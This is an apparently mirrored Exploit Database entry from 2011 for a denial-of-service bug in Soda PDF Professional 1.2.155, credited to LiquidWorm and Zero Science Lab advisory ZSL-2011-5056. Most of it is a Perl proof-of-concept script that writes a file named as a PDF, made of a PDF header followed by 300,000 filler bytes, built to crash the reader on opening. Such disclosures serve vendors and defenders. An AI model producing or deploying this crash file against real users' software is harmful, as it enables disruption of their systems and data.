Soda PDF Professional 1.2.155 – ‘.pdf’ / ‘.WWF’ File Handling Denial of Service

• Exploit Database
• 127 阅读

• 作者： LiquidWorm
  日期： 2011-11-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18106/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  #!/usr/bin/perl # # # Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS) # # # Vendor: LULU software # Product web page: http://www.sodapdf.com # Affected version: 1.2.155.1729 (Professional with OCR) # # Summary: Increase your efficiency with Soda PDF Professional, the smart # & simple tool for opening, creating, editing, converting, and securing # PDF files in a collaborative environment. Save time by using powerful # automated features like batch PDF creation, professional templates & # document comparison. # # Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability # when handling PDF or WWF file formats which can be exploited by malicious # people to cause a denial of service scenario. # # # Tested on: Microsoft Windows XP Professional SP3 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # # # Advisory ID: ZSL-2011-5056 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php # # # 10.11.2011 #     use strict;   my $file = "Midnight_in_Paris.pdf"; # or .wwf my $tovar = "\x25\x50\x44\x46\x0A"."\x41" x 300000; print "\n\n[*] Creating $file file...\n"; open ZSL, ">./$file" || die "\nCan't open $file: $!"; print ZSL $tovar; print "\n[.] File successfully mounted!\n\n"; close ZSL;